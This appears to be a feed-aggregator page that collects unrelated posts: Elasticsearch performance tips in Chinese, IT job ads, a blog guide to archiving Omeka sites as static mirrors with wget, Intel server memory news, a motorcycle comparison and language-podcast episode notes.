由于是对数据库的实时复制分发,效率和并发量要求都会较高。以下是我们对Elastic Search的写所采用的一些优化方案:

  • 使用bulkrequest,把多个请求合并在一个请求里面。Elastic Search的工作机制对批量请求有较好的性能,例如translog的持久化默认是request级别的,这样写硬盘的次数就会大大降低提高写的性能。至于具体一个批次多少个请求,这个与服务器配置、索引结构、数据量都有关系。可以使用动态配置的方式,在生产上面调试。

  • 对于实时性要求不高的索引,把index.refresh_interval设置为30秒(默认是1秒)。这样可以让Elastic Search每30秒创建一个新的segment,减轻后面的flush和merge压力。

  • 提前设置索引的schema,去除不需要的功能。例如默认对string类型的映射会同时建立keyword和text索引,前者适合于完全匹配的短信息,例如邮寄地址、服务器名称,标签等,而后者适合于一片文章中的某个部分的查询,例如邮件内容、产品说明等。根据具体查询的场景,选择其中一个即可。

image

对于不关心查询结果评分的字段,可以设置为norms:false。

image

对于不会使用phrase query的字段,设置index_options: freqs。

image

 

  • 对于能接受数据丢失的索引或者有灾备服务器的场景,把index.translog.durability设置成async(默认是request)。把对lucene的写持久化到硬盘是一个相对昂贵的操作,所以会有translog先持久化到硬盘,然后批量写入lucene。异步写translog意味着无需每个请求都去写硬盘,能提高写的性能。在数据初始化的时候效果比较明显,后期实时写入使用bulkrequest能满足大部分的场景。


提高Elastic Search读的性能

image

为了提高查询的性能,我们做了以下优化:

  • 写的时候指定查询场景最高的字段为_routing的值。由于Elastic Search的分布式分区原则默认是对文档id进行哈希和取模决定分片,所以如果把查询场景最高的字段设为_routing的值就能保证在对该字段查询时,只要查一个分片即可返回结果。

写:

image

查:

image

  • 对于日期类型,在业务能够接受的范围内,尽可能降低精确度。能只包含年月日,就不要包含时分秒。当数据量较大时,这个优化的效果会特别的明显。因为精度越低意味着缓存的命中率越是高,查询的速度就会越快,同时内存的重复利用也会提升Elastic Search服务器的性能,降低CPU的使用率,减少GC的次数。


系统监控的实现

image


技术中心专门为业务部门开发了一套监控系统。它会周期性的调用所有服务器的Elastic Search CAT API,把性能数据保存在单独的Elastic Search服务器中,同时提供一个网页给应用负责人进行数据的监控。

image


灾备的实现

image

Elastic Search本身是分布式的。在创建索引时,我们根据未来几年的数据总量进行了分片,确保单片数据总量在一个健康的范围内。为了在写入速度和灾备之间找到一个平衡点,把备份节点设置为2。所以数据分布在不同的服务器上,如果集群中的一个服务器宕机,另外一个备份服务器会直接进行服务。

同时为了防止一个机房发生断网或者断电等突发情况,而导致整个集群不能正常工作,我们专门在不同地区的另一个机房部署了一套完全一样的Elastic Search集群。日常数据在复制分发的时候,会同时写一份到灾备机房以防不时之需。


总结

image

整个项目的开发是一个逐步演进的过程,实现过程中也遇到了大量问题。项目上线后,应用服务器的CPU与内存都有大幅下降,同时查询速度与没有分片之前基本持平。在此分享遇到的问题和解决问题的思路,供大家参考。

参考

  • Elastic Search官方文档;

  • https://en.wikipedia.org/wiki/Database_index

  • https://baike.baidu.com/item/%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B4%A2%E5%BC%95

  • https://logz.io/blog/solr-vs-elasticsearch/

【推荐阅读】

image


          TVS Apache RTR 200 4V Vs Bajaj Pulsar NS200- Specification Comparison      Cache   Translate Page   Web Page Cache   

Here we put the TVS Apache RTR 200 4V Vs Bajaj Pulsar NS200. In the 200cc segment bikes, there are handful ones, out of which these two are the most popular. The Apache offers many features in its segment, while the Pulsar offers the grunty engine with great fuel efficiency. Let’s check out the comparison […]

The post TVS Apache RTR 200 4V Vs Bajaj Pulsar NS200- Specification Comparison appeared first on CarBlogIndia.


          Software Engineer - OpenEdge Specialist - Luxembourg      Cache   Translate Page   Web Page Cache   
Software Engineer - OpenEdge Specialist - Luxembourg - Altele

Software Engineer - OpenEdge Specialist

An International Company based in Luxembourg is looking for an Software Engineer OpenEdge Specialist. The Software Engineer will take responsibilities in a broad range of architecture, infrastructure and security engineering activities, especially covering IFS Web applications running Progress OpenEdge Application Server.

Task/Responsibilities

- You will act as a database administrator for Progress OpenEdge databases. As such, you will be a key member of the working group in charge of designing, delivering for, administrating and supporting those areas. Your assignments will include:
Designing, developing, delivering and documenting OpenEdge Appserver/Webspeed and httpd Web server infrastructures. This especially covers the security and deployment/sizing configurations, as well as the deployment, operation and monitoring tooling
Participating in the creation and documentation of the architecture and security of IFS systems in general, including critical Internet customer-facing applications and systems using Public Cloud services; you will also be working on the applicable processes and standards
Acting as a database administrator for OpenEdge RDBMS, performing configuration, investigation and maintenance tasks
Monitoring and optimizing the usage of Progress software licenses
Assessing and driving the OpenEdge software upgrades
Interacting with Progress Support engineers, managing support cases and product roadmap
Participating in Middleware infrastructure activities that extend beyond the OpenEdge technology, especially in the area of enterprise Java
Analysing and remediating security vulnerabilities and security risks
Working with the other group members, reporting to the group lead
Participating in production implementation activities

Qualifications/required skills

  • University Degree (or equivalent) in computer science
  • Experience in configuring and deploying Progress OpenEdge 11 Classic AppServer/WebSpeed/WebSpeed Messenger. Knowledge of Pacific OpenEdge Application Server, Apache httpd and Apache ActiveMQ would be an asset.
  • Experience in configuring, deploying and maintaining Progress OpenEdge database
  • Experience in ABL programming language
  • Practical knowledge of TLS and public key cryptography, certificate and key deployment
  • Minimum experience in the Java language and a Java enterprise platform such as JavaEE or Spring
  • Understanding of the challenges posed by critical enterprise Web Middleware infrastructure, especially in the areas of information security, high-availability and performance
  • Ability to structure and document architecture and security concepts; very good English technical writing skills
    Practical experience in the following technologies:
    o Linux and Windows OS; Shell Scripting
    o a Version Control System, preferably Git
    o an IDE (preferably Progress Developer Studio/Eclipse)
    o XML Schema
    o Apache Maven
    o Apache Ant
    Additional assets will be: experience with public Cloud services and APIs (preferably Microsoft Azure); experience with Jenkins, Docker, Kubernetes and Ansible
    Proficiency in written and spoken English; French and German language skills will be an asset
    Companie: SKILLFINDER INTERNATIONAL
    Tipul locului de muncă: Alte

          Senior Cloud engineer      Cache   Translate Page   Web Page Cache   
Senior Cloud engineer - Altele

Senior Cloud engineer

Task/Responsibilities

As part of our modernization strategy, you will take an active participation in the design of two new applications eventually deployed into the Microsoft Azure cloud; a reference data management system and a digitization platform primarily used for document data extraction and access through APIs. As such, you will be a key actor in charge of designing and integrating those applications with the current on premise IT landscape. Your assignments will include:
Designing and documenting the cloud architecture, ensuring non-functional requirements and alignment with IT security guidelines
Developing and executing practical use cases to validate the proposed design and technology, eg high availability, performance, crash recovery
Defining and documenting new standards relevant to the development and deployment of cloud applications
Assessing and optimizing the cost of using Microsoft Azure
Upskilling of the teams involved in the design, development, provisioning and operation of cloud applications
Qualifications/required skills - Master's Degree (or equivalent) in a computer-based discipline
Good communication skills with the ability to justify and challenge architecture decisions
Hands-on experience in architecting Microsoft Azure native applications
Hands-on experience in Microsoft Azure infrastructure services (IaaS). Concrete experience in migrating on premise applications to Microsoft Azure is an asset
Experience with Serverless, Microservices and REST architecture styles
Experience in application security design, incl. identity and access management together with encryption and key management
Experience in regulatory requirements and concerns is an asset, eg risk assessment, exit strategy, data protection
Practical experience in the following technology:
o Linux OS, preferably RedHat Linux
o Java/J2EE, preferably RedHat EAP. Knowledge in Go, Spring Boot, Angular and/or React is an asset
o Messaging Middleware, preferably RedHat A-MQ
o RDBMS, preferably Oracle and MySQL
o Identity Management, preferably OpenAM
o Jenkins, Docker and Ansible
o Version Control System, preferably Git
o Repository manager, preferably Artifactory
o Apache Maven or Apache Ant
- Proficiency in written and spoken English; French and German language skills is an asset

    Companie: SKILLFINDER INTERNATIONAL
    Tipul locului de muncă: Alte

          Ed Summers: Omeka Staticify (👜🕸)      Cache   Translate Page   Web Page Cache   

If you have some old Omeka sites that are still valuable resources, but are no longer being actively maintained, you might want to consider converting them to a static site along with the PHP code and database. This means that the site can stay online in much the form that it’s in now, at the same URLs, and you still have the code and database to bring it back if you want to. From a maintenance perspective this is a big win since you no longer have the problem of keeping the PHP, Omeka and MySQL code up to date and backed up. The big trade off is that the site becomes truly static. Making any changes across the static assets would be quite tedious. So only consider this if you really anticipate that the project is no longer being actively curated.

I have done this a few times with many Wordpress sites, but Omeka is a little bit different in a few ways so I thought it was worth a quick blog post to jot down some steps.

Disable Search

This is kind of important for usability. Since there will no longer be any server side PHP code and database for it to query, there’s unfortunately no way to have a search form on your Omeka site. This may be a deal break for you, depending on how you are using the search. The good news however is that people can still find your site via Google, DuckDuckGo, or some other search engine.

To disable search take a look in your Omeka theme, often in common/header.php and simply comment out the code that generates the search form:

It might be nice to be able to generate a static Lunr.js index for your database and drop it into your Omeka site before creating the static version. This an approach that the minimal computing project Wax has taken, and should work well for average size collections. Or perhaps you could configure a Google Custom Search Engine, and similarly drop that into your Omeka before conversion. But it may be easiest to simply accept that some functionality will be lost as part of the archiving process.

Localize External Resources

It’s fairly common to use JavaScript and CSS files from various CDNs. To find them iew the source of one of your Omeka pages and scan for http to review the types of JavaScript and CSS files that might be needed for the pages to work properly. If you find any try downloading them into your theme and then updating your theme to reference them there.

Use Slash URLs

This one is kind of esoteric, but could be important. Most Omeka installs don’t use trailing slashes on URLs, for example:

https://archive.blackgothamarchive.org/items
https://archive.blackgothamarchive.org/items/show/121

The problem with this is that when you use a tool like wget to mirror a website it will download those pages using a .html extension:

archive.blackgothamarchive.org/items/show/121.html
archive.blackgothamarchive.org/items.html

This works just fine when you mount it on the web, but if anyone has linked to https://archive.blackgothamarchive.org/items/show/121 they will get a 404 Not Found.

One way around this is to convert your application URLs to end in a slash prior to creating your mirror. You can do this by modifying the url function which can be found in libraries/globals.php or in application/helpers/Url.php in older versions of Omeka. This issue ticket has some more details.

Then your URLs will look like this:

https://archive.blackgothamarchive.org/items/
https://archive.blackgothamarchive.org/items/show/121/

and will be saved by wget as:

archive.blackgothamarchive.org/items/index.html
archive.blackgothamarchive.org/items/show/121/index.html

Then when someone comes asking for an old link like:

https://archive.blackgothamarchive.org/items/show/121

Apache will happily redirect them to:

https://archive.blackgothamarchive.org/items/show/121/

and serve up the index.html that’s there. Whew. Yeah, all that for a for a forward slash. But if links are important to you it might be worth the code spelunking to get it working.

Do the Crawl

I’ve used wget for this in the past. It’s a venerable tool, that has been battle hardened over the years. It won’t execute JavaScript in your pages, but most Omeka applications don’t rely too heavily on that – it could be a problem if you use this approach to archive other types of sites.

The one problem with wget is it has many, many options, many of which interact in weird ways. Here’s an example wget command I use:

wget \
  --output-file $log \
  --warc-file $name \
  --mirror \
  --page-requisites \
  --html-extension \
  --convert-links \
  --wait 1 \
  --execute robots=off \
  --no-parent $url 2>/dev/null

This is painful so I’ve developed a little helper utility I call bagweb so I don’t need to remember the options and what they do every time I want to mirror a website. The –warc-file option will also create a WARC file as it goes if you tell it too, which can be useful, as we’ll see in a second. You run bagweb giving it a URL and a name to use for a new directory that will contain a BagIt package:

% bagweb https://archive.blackgothamarchive.org bga

This will run for a while writing a log to bga.log. Once it’s done you’ll see a directory structure like this:

% tree bga
bga
├── bag-info.txt
├── bagit.txt
├── data
│   ├── bga.warc.gz
│   └── archive.blackgothamarchive.org.tar.gz
├── manifest-md5.txt
└── tagmanifest-md5.txt

You can zip up that directory or copy it to an archive. But before we do that let’s test them.

Test!

You can unpack your mirrored website and make sure they work properly using [Docker] to easily start up an Apache instance:

tar xvfz bga/data/archive.blackgothamarchive.org.tar.gz
cd archive.blackgothamarchive.org
docker run -v `pwd`:/usr/local/apache2/htdocs -p 8080:80 httpd

And then turn off your Internet connection (wi-fi, ethernet, whatevs) and visit this URL in your browser:

http://localhost:8080/

You should see your Omeka site! For extra points you can download Webrecorder Player and open the generated WARC file and interact with it that way.

Install

Now that you have your static version of the website you need to move it up to your production web server. That should be as simple as copying the tarball up to a <DocumentRoot> configuration.

You may also want to create a tarball of the Omeka server side code and a MySQL dump of the Omeka database to save in your bag. It’s probably worth noting some details about external dependencies in the bag-info.txt such as the version of Apache, PHP, MySQL and the operating system type/version for anyone courageous enough to try to get the code running again in the future.

So, hardly a walk in the park. But if the Omeka environment is at risk for whatever reason this is a pretty satisfying process that ensures that the data is preserved, and still available on the web for people to use.


          Revue de Presse Xebia      Cache   Translate Page   Web Page Cache   

La revue de presse hebdomadaire des technologies Big Data, DevOps et Web, architectures Java et mobilité dans des environnements agiles, proposée par Xebia Craftsmanship  Audit d’architecture: à quoi s’attendre – Craftsmanship Front Best of 2016 Lighthouse : Progressive Web Apps Done Right Data  Sortie d’ Apache Spark 2.1  Craftsmanship  Audit d’architecture: à quoi s’attendre – Craftsmanship Comment déterminer...

L’article Revue de Presse Xebia est apparu en premier sur Blog Xebia - Expertise Technologique & Méthodes Agiles.


          Comment on Disable Cookies using .htaccess file by Sohail Rahman Khan      Cache   Translate Page   Web Page Cache   
Hi I have a development domain. I have added this to .htaccess file of that. Now I am linking the css file from that domain but still Yslow shows that css file being pulled is not cookie free. I have apache 2.2 server, Modx CMS.
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA      Cache   Translate Page   Web Page Cache   
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Software Development Manager – Big Data, AWS Elastic MapReduce (EMR) - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
Amazon EMR is a web service which enables customers to run massive clusters with distributed big data frameworks like Apache Hadoop, Hive, Tez, Flink, Spark,...
From Amazon.com - Mon, 02 Jul 2018 08:17:21 GMT - View all Seattle, WA jobs
          Sr. Technical Account Manager - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
You can also run other popular distributed frameworks such as Apache Spark, Apache Flink, and Presto in Amazon EMR;...
From Amazon.com - Wed, 20 Jun 2018 01:20:13 GMT - View all Seattle, WA jobs
          Software Development Engineer - Amazon Web Services - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
Experience with Big Data technology like Apache Hadoop, NoSQL, Presto, etc. Amazon Web Services is seeking an outstanding Software Development Engineer to join...
From Amazon.com - Mon, 18 Jun 2018 19:27:06 GMT - View all Seattle, WA jobs
          Deschidere rapida pagini web-index.html in Ajutor și asistență tehnică : Programare, dezvoltare software, hardware, web      Cache   Translate Page   Web Page Cache   
Topic: Deschidere rapida pagini web-index.html Message: Va salut,am o problema cu paginile web care contin peste 6 video in format mp4 de cate 2 ore, cand se acceseaza pagina si anumese tot incarca si incarca si incarca daca sunt mai multe puse pe o singura pagina.Asi dori daca se poate  sa imi spuneti cum sa fac sa fie in acea pagina doar o simpla imagine de la inregistrarea video si nu toata inregistrarea iar cand se da clic pe ea sa porneasca printr-un link.Folosesc apache2 Daca pun una doua trei incarca repede dar daca pun 24 niciodata nu merge si cu 6 incarca foarte mult timp.  indexKrefeld2018-a.html                                                           

                            

             Krefeld 2018 - fr.Ewald Frank                    Krefeld 2018 fr.Frank   

video - audio - scrise


   
1 Iul 2018 
 

1 Iul 2018 Kref   
        Multumesc.

          Intel’s High-End Cascade Lake CPUs to Support 3.84 TB of Memory Per Socket      Cache   Translate Page   Web Page Cache   

While Intel has yet to detail its upcoming Cascade Lake processors for servers, some of the key characteristics are beginning to emerge. According to a new report from ServeTheHome, some of the new chips will support up to 3.84 TB of memory per socket, double the amount supported by contemporary Skylake-based Xeon Platinum M-series CPUs that support 1.5 TB of DDR4, due to combining 512 GB Optane DIMMs and 128GB DDR4 DIMMs. For a dual socket system, this rises to up to 7.68 TB per node.

Last year Intel published a picture of a Cascade Lake-based server outfitted with six DDR4 DIMMs and six Optane Persistent Memory DIMMs per socket. Intel’s code-named Apache Pass modules have 512 GB capacity, whereas commercial standard DDR4 LRDIMMs often carry a peak of 128 GB of usable memory. If these modules are installed into a server, in a 6 x Optane and 6 x DDR4 configuration, they will provide 3072 GB of 3D XPoint memory and 768 GB of DDR4 RAM for a total of 3.84 TB of memory.

For write endurance reasons, six DDR4 DIMMs and six Optane DIMMs per socket will likely be a popular configuration for servers that run databases which benefit from high capacity of memory.

These metrics are confirmed by a document released by QCT and their QCT QuantaMesh systems, with the key picture here below:

The top left is a single server in a 1U configuration, showing five PCIe expansion slots and up to 7.68 TB memory capacity when a Cascade Lake CPU is installed. The bottom right is the T42D-2U, giving four nodes in a 2U configuration, totalling 30 TB memory capacity for a 2U rack. Given that the price of a single DDR4 128GB LRDIMM is circa $3500, and pricing for Optane still unknown, along with reports that pricing for Cascade Lake might be adjusted, these systems are likely to cost a pretty penny.

It is worth noting, given Intel's historic policy on product segmentation, that not all Cascade Lake SKUs will support the maximum 3.84 TB of memory, leaving it only to premium models. Or Intel may go even further, potentially, and say that not all SKUs will support Optane DIMMs - that might also be a premium feature. Intel did not confirm at the launch of Optane if all of the Cascade Lake Xeons would support it (the official response was 'we haven't released that information yet').

Related Reading

Source: ServeTheHome


          Infrastructure & App Monitoring Analyst - Horizontal Integration - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Horizontal Integration - Wed, 13 Jun 2018 19:35:57 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Q Consulting - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Q Consulting - Thu, 07 Jun 2018 20:21:40 GMT - View all De Pere, WI jobs
          maven build 出现Failed to execute goal org.apache.tomcat.maven:      Cache   Translate Page   Web Page Cache   
myeclipse集成maven build后出现这个问题,一直找不到原因,把maven重装还是一样问题,网上找的方法都没用,是不是我安装出了什么问题?另外其他插件也是不停出问题。 [INFO] Scanning for projects... [INFO]  [INFO] --------------------------< com.lzh:TestSSM1 >-------------------------- [INFO] Building Test...
          Términos Open Source que debes conocer      Cache   Translate Page   Web Page Cache   
De Top Open Source Terms You Need To Know · Apache Foundation: organización sin fines de lucro fundada en 1999 que supervisa el desarrollo y alojamiento de cientos de proyectos de código abierto, incluidos Kafka, Hadoop, Apache Web Server,.. · Branch: un duplicado de una pieza de código que se encuentra en el control de […]
          The Last Straw - 11 December 2017      Cache   Translate Page   Web Page Cache   

Books for word lovers, plus the stories behind some familiar terms. Want a gift for your favorite bibliophile? Martha and Grant have recommendations, from a collection of curious words to some fun with Farsi. Plus, some people yell "Geronimo!" when they jump out of an airplane, but why that particular word? Also, we call something that heats air a heater, so why do we call something that cools the air an air conditioner? The answer lies in the history of manufacturing. Also, quaaltagh, snuba, the last straw vs. the last draw, and I have to go see a man about a horse.

FULL DETAILS

There's a word for the first person to walk through your door on New Year's Day. The word quaaltagh, and it's used on the Isle of Man. This Manx term is one of many linguistic delights in a book Martha recommends for word lovers: The Cabinet of Linguistic Curiosities: A Yearbook of Forgotten Words, by Paul Anthony Jones.

Why do we use the term air-conditioner to refer a mechanism for cooling air, when we use the word heater to describe a mechanism for heating air? The term air conditioning was borrowed from the textile industry, where it referred to filtering and dehumidifying. The first use of this term is in a 1909 paper by Stuart Cramer called Recent Developments in Air Conditioning.

Snuba is a portmanteau--a combination of snorkel and scuba--and refers to snorkeling several feet underwater while breathing through a long hose that's attached to an air supply float on a raft.

What do you call that last small irritation, burden, or annoyance that finally makes a situation untenable? Is it the last straw or the last draw? Hint: it has nothing to do with a shootout at the OK corral.

We've talked before about kids' funny misunderstandings of words. Martha shares another story from a Dallas, Texas, listener.
Quiz Guy John Chaneski has an inside-out puzzle that's clued by a short sequence of letters inside a longer one. For example, what holiday contains the letters KSGI?

A man in Surprise, Arizona, wonders why people jumping into a pool sometimes yell Geronimo! The history of this exclamation goes back to an eponymous 1939 movie about the famed Apache warrior Geronimo. The film was quickly popular on U.S. military bases, where the warrior's name became a rallying cry. A widely circulated story goes that in 1940, a U.S. Army private named Aubrey Eberhardt responded to teasing about his first parachute jump by yelling Geronimo! as he leapt into the wild blue yonder.

The acronym NIMBY stands for Not In My Back Yard. A more emphatic version used among urban planners is BANANA, which stands for Build Absolutely Nothing Anywhere Near Anything.

Someone who's really hungry might say I'm falling to staves, meaning they're famished. It's a reference to the way a barrel falls apart if the metal hoops that hold them together are removed.

A listener in Plaza, North Dakota, says he tried to signal some teenagers to lower their car window by moving his fist in a circle, but since they grew up with push-button window controls, they didn't understand the gesture. What's the best gesture now for communicating that you want someone to roll down their car window?

For the book lover on your gift list, Grant recommends the mix of magic in science in All the Birds in the Sky by Charlie Jane Anders. He also likes the work of Firoozeh Dumas: It Ain't So Awful Falafel, about an Iranian teenage girl living in California, as well as Dumas's books for adults, Funny in Farsi, and Laughing Without An Accent. Martha recommends Kory Stamper's love letter to lexicography, Word by Word: The Secret Life of Dictionaries, and Jessica Goodfellow's poetry collection about mountaineering, Whiteout.

A woman in Virginia Beach, Virginia, says her Appalachia-born grandmother would occasionally say that it was time to string the leather britches, or hang up the leather britches, or string up the leather britches. She was referring to preserving green beans. So why the leather and britches?

If you're living with a chronic illness or disability, you often have to ration your physical and mental energy. And if that illness isn't readily apparent to others, it can be hard to explain how debilitating that process can be. On her website But You don't Look Sick, writer Christine Miserandino, who has lupus, illustrates that process with handful of spoons, each representing a finite amount of physical and mental energy that must be spent in order to get through a typical day. Someone without a disability or illness starts each day with an unlimited number of spoons, while others must weigh which task is worth spending a spoon for, and then making more decisions as the supply is depleted. Inspired by that metaphor, a growing community of people facing such invisible challenges call themselves spoonies.

A listener in Elizabeth City, North Carolina, recalls that his grandfather used to announce he was headed to the restroom by saying I have to go see a man about a horse. An earlier version of the phrase is I have to go see a man about a dog. These phrase are among many euphemisms for leaving to take care of bathroom business, such as going to see Miss White or going to go pluck a rose.

A Burlington, Vermont, listener wants to settle a dispute: Can laughter be described as gregarious?

This episode is hosted by Martha Barnette and Grant Barrett, and produced by Stefanie Levine.

--

A Way with Words is funded by its listeners: http://waywordradio.org/donate

Get your language question answered on the air! Call or write with your questions at any time:

Email: words@waywordradio.org

Phone:
United States and Canada toll-free (877) WAY-WORD/(877) 929-9673
London +44 20 7193 2113
Mexico City +52 55 8421 9771

Donate: http://waywordradio.org/donate
Site: http://waywordradio.org/
Podcast: http://waywordradio.org/podcast/
Forums: http://waywordradio.org/discussion/
Newsletter: http://waywordradio.org/newsletter/
Twitter: http://twitter.com/wayword/
Skype: skype://waywordradio

Copyright 2017, Wayword LLC.


          SL Announces Monitoring as a Service for Apache Kafka      Cache   Translate Page   Web Page Cache   
...defined alerts and pre-built monitoring displays, users can quickly deploy a powerful monitoring solution without the time, skill and expense necessary to build or configure their own monitoring applications. The new RTView Cloud designer provides additional capability for users to ...


          Middleware Engineer-II (Middleware Senior) - Mainstreet Technologies, Inc - McLean, VA      Cache   Translate Page   Web Page Cache   
Middleware Engineer-II (Middleware Senior) Job Requirements: Required Skills: 3 – 5 years of Apache administration experience 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Thu, 17 May 2018 04:46:56 GMT - View all McLean, VA jobs
          Middleware Engineers - Mainstreet Technologies, Inc - McLean, VA      Cache   Translate Page   Web Page Cache   
Middleware Engineer Professional Required Technical Skills Bachelor’s Degree · 3 – 5 years of Apache administration experience · 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Mon, 14 May 2018 10:39:11 GMT - View all McLean, VA jobs
          Infrastructure & App Monitoring Analyst - Horizontal Integration - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Horizontal Integration - Wed, 13 Jun 2018 19:35:57 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Q Consulting - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Q Consulting - Thu, 07 Jun 2018 20:21:40 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Ascent Services Group - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Ascent Services Group - Sun, 03 Jun 2018 15:34:33 GMT - View all De Pere, WI jobs
          Infrastructure & App Monitoring Analyst - Talent Software Services - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Talent Software Services - Sat, 02 Jun 2018 03:34:20 GMT - View all De Pere, WI jobs
          Infrastructure & Application Monitoring Analyst - Ameriprise Financial - De Pere, WI      Cache   Translate Page   Web Page Cache   
Java &amp; ASP.NET containers (Apache, Tomcat, IIS), servers, networking (switches, firewalls, load balancers), hardware, operating systems (Windows, AIX, Linux),...
From Ameriprise Financial - Fri, 23 Mar 2018 18:56:54 GMT - View all De Pere, WI jobs
          인텔 차세대 제온 CPU, 소켓당 3.84TB 메모리 지원?      Cache   Translate Page   Web Page Cache   
인텔이 2018년 3분기 초 출시를 준비 중인 캐스캐이드 레이크(Cascade Lake) SP 기반 제온 스케일러블 프로세서에 대한 내용이 전해졌다. 2017년 출시된 스카이레이크 SP 기반 제온 스케일러블 프로세서는 6채널과 채널 당 2 DIMM으로 최대 12개의 메모리 슬롯을 지원해 CPU당 768GB를 지원하며, 캐스캐이드 레이크 SP는 이의 후속 제품군이다. 이보다 앞서 인텔은 캐스캐이드 레이크 SP에 코드네임 아파치 패스(Apache Pass).. 기사보기

          (USA-UT-Salt Lake City) Windows System Administrator III      Cache   Translate Page   Web Page Cache   
Myriad Genetics is looking for a Windows Systems Administrator III who possesses a strong level of experience and technical skill, will contribute within a fantastic team, and can demonstrate excellent customer service and initiative to ensure the business needs are understood and met. + Perform design, implementation, and administration of hardware and software systems including, but not limited to: + Servers - Windows(2008, 2008 R2, 2012R2, 2016) + Kofax Capture, Transformation Module, Total Agility + OpenText ApplicationXtender Content Management System + VMware- ESX Infrastructure, vSphere 6.5 or above, NSX, Horizon 7, Airwatch/Workspace One + Experience with Dell Server Hardware Platforms + Active Directory, DNS, DHCP, Exchange, MailGate, VPN, WSUS, Microsoft Endpoint Protection, IIS/apache, Certificate Authority, SharePoint + Microsoft Systems Center & Configuration Manager and Endpoint Protection + Microsoft SQL Server 2008/2012 or above including always-on availability groups + Identity Management systems + Backup/recovery systems (NetBackup Enterprise) + Scanning and content management systems + Contribute to on-call rotation for 24x7 support of Windows server systems. + Participate in scheduled off hours monthly maintenance activities + Resolve ticket requests from the business units and end users in a timely manner + Train users and cross-train IT staff as needed + Create documentation for systems and processes and automate applicable processes + Ensure system backups are executed regularly and efficiently + Ensure system security through use of tools and standard processes + Work with vendors and service providers as needed to resolve issues and ensure best practices are followed Minimum Requirements to be considered for the position: + BS in Computer Science, Information Systems, a related degree, or equivalent experience + 3-6 years of progressively responsible work in Windows server systems, preferably in a medium to large enterprise. + PowerShell scripting experience + Excellent troubleshooting and customer service skills A successful candidate will demonstrate: + Continuous improvement attitude and proactive mentality to anticipate and plan for future needs and opportunities + High standard of customer service, quality, and attention to detail + Ability to utilize a high degree of creativity, analytical thinking, and initiative to solve business problems + Ability to excel in high pressure multitasking situations + Ability to excel in a collaborative team environment as well as work independently while following documented processes and procedures + Desire to share knowledge amongst the team through cross-training and documentation of systems, processes, and procedures + Strong oral and written English language skills including experience creating written documentation for technical and non-technical audiences + Experience with successfully managing systems through all phases of the system lifecycle + Ability to quickly learn new skills and systems PREFERRED TECHNICAL QUALIFICATIONS: + MSSQL, VMware ESX, Microsoft AD, and Exchange The physical demands described here are representative of those that must be met by an employee to successfully perform the essential functions of this job. While performing the duties of this job, the employee is frequently required to sit; talk; or hear. The employee is occasionally required to stand; walk; use hands to finger, handle, or feel; reach with hands and arms; and stoop; kneel; or crouch The employee must occasionally lift and/or move up to 50 pounds. Specific vision abilities required by this job include close vision, distance vision and depth perception. Myriad Genetics Inc., is a leading personalized medicine company dedicated to being a trusted advisor transforming patient lives worldwide with pioneering molecular diagnostics. Myriad discovers and commercializes molecular diagnostic tests that: determine the risk of developing disease, accurately diagnose disease, assess the risk of disease progression, and guide treatment decisions across six major medical specialties where molecular diagnostics can significantly improve patient care and lower healthcare costs. Myriad is focused on three strategic imperatives: maintaining leadership in an expanding hereditary cancer market, diversifying its product portfolio through the introduction of new products and increasing the revenue contribution from international markets. For more information on how Myriad is making a difference, please visit the Company's website: www.myriad.com. Myriad is an equal opportunity employer and as such, affirms in policy and practice to recruit, hire, train and promote, in all job classifications without regard to race, color, religion, gender, age, sexual orientation, gender identity, national origin, disability status or status as a protected veteran. Reasonable accommodation will be provided for qualified individuals with disabilities and disabled veterans in job application procedures. We believe that diversity lends a regional, national, and global advantage to the clients we serve. Our workforce consists of dynamic individuals, with a range of backgrounds, talents, and skills. Requisition ID: 2018-7241 Location Details: SLC Name: Myriad Genetics, Inc. Street: 320 Wakara Way
          Middleware Engineer-II (Middleware Senior) - Mainstreet Technologies, Inc - McLean, VA      Cache   Translate Page   Web Page Cache   
Middleware Engineer-II (Middleware Senior) Job Requirements: Required Skills: 3 – 5 years of Apache administration experience 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Thu, 17 May 2018 04:46:56 GMT - View all McLean, VA jobs
          Middleware Engineers - Mainstreet Technologies, Inc - McLean, VA      Cache   Translate Page   Web Page Cache   
Middleware Engineer Professional Required Technical Skills Bachelor’s Degree · 3 – 5 years of Apache administration experience · 5 – 7 years of WebLogic...
From Mainstreet Technologies, Inc - Mon, 14 May 2018 10:39:11 GMT - View all McLean, VA jobs
          Comentario en Cómo instalar Apache Cordova en Ubuntu 18.04 por Sito      Cache   Translate Page   Web Page Cache   
